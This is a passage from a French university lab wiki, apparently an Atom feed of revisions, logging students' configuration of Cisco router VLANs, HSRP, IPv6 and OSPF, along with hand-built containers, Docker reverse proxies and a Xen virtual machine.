L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49099</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49099"/>
				<updated>2018-12-21T15:28:51Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Configuration OSPF */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
